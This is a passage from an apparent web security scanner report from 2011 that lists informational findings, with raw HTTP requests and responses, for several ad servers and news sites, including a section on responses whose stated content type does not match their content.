24.25. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Set-Cookie: /BC3=.P_d.; path=/
Set-Cookie: /SO=:201:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 16-May-2011 14:00:59 GMT
Set-Cookie: /SC=0-2vc.1; path=/
Content-Length: 1393


document.write('<IFR'+'AME SRC="http://ad.doubleclick.net/adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI
...[SNIP]...

24.26. http://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Request

GET /cgi-local/cart.cgi?asmakit_shopcart_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>

24.27. https://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Request

GET /cgi-local/cart.cgi?asmakit_AKR213_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Connection: close
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>

24.28. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...

24.29. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...

24.30. http://www.nme.com/hotspot/channel/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nme.com
Path:   /hotspot/channel/news

Request

GET /hotspot/channel/news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:04:08 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 17e868748e3a14e95d31caaebea7641546c76221"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 23|[{"Type":"LOG"},"cs: "]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3580"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 3145728"]|
X-Wf-1-1-1-9: 40|[{"Type":"LOG"},"ts: 0.030310153961182"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Length: 832
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:04:08 GMT
Date: Mon, 09 May 2011 14:04:08 GMT
Connection: close
Vary: Accept-Encoding

<div class="ad_1">
<iframe id="hotspot_1" src="/adcode/hot-spot.html?spot=1&channel=news" width="176" height="185" frameborder="0" scrolling="no"></iframe>
</div>
<div class="ad_2">
<iframe id="ho
...[SNIP]...

24.31. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /hive/common/includes/google-adsense-content-orlnews.html

Request

GET /hive/common/includes/google-adsense-content-orlnews.html?client=ca-tribune_news3_html&google_ad_channel=Orlandosentinel_story_pos1&type=wide&page_url=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,2290449,print.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business; __switchTo5x=97; __unam=23536f-12fd50e4220-5f39d80-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Expires: Mon, 09 May 2011 13:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Google Ads</title>
<link href="/hive/stylesheets/sponsoredlinks-orlnews.css" media="all
...[SNIP]...

24.32. http://www.sufjan.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sufjan.com
Path:   /

Request

GET / HTTP/1.1
Host: www.sufjan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
Last-Modified: Tue, 10 Mar 2009 23:58:35 GMT
ETag: "23ac809a-41c-464cc876cc0c0"
Accept-Ranges: bytes
Content-Length: 1052
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sufjan Stevens</title>
<link href="/css/basicmap.css" rel="stylesheet" type="text/css">
<META
content="Sufjan Stev
...[SNIP]...

24.33. http://www.surphace.com/ads/rubicon_orlandosentinel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surphace.com
Path:   /ads/rubicon_orlandosentinel

Request

GET /ads/rubicon_orlandosentinel HTTP/1.1
Host: www.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Content-Location: rubicon_orlandosentinel.html
TCN: choice
Last-Modified: Mon, 07 Mar 2011 17:01:49 GMT
X-Machine: web9
Content-Type: text/html
x-forwarded-for: 24.236.115.157
Content-Length: 1282
Date: Mon, 09 May 2011 13:59:59 GMT
X-Varnish: 730030160 685198647
Age: 569244
Via: 1.1 varnish
Connection: keep-alive

<html><head></head><body>
<script type='text/javascript'><!--//<![CDATA[
var m3_u = (location.protocol=='https:'?'https://d.tradex.openx.com/ajs.php':'http://d.tradex.openx.com/ajs.php');
var m3
...[SNIP]...

25. Content type incorrectly stated
There are 24 instances of this issue:

Issue background

If a web response specifies an incorrect content type, browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type itself. Either case can lead to unexpected results, and if the content contains any user-controllable data, this may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-Type header that correctly and unambiguously states the MIME type of the content in the response body.


25.1. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The response contains the following Content-type statement: the response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;~cs=f
Date: Mon, 09 May 2011 14:00:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1183

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...

25.2. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement: the response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

25.3. http://ar.voicefive.com/b/rc.pli

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1304949596809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 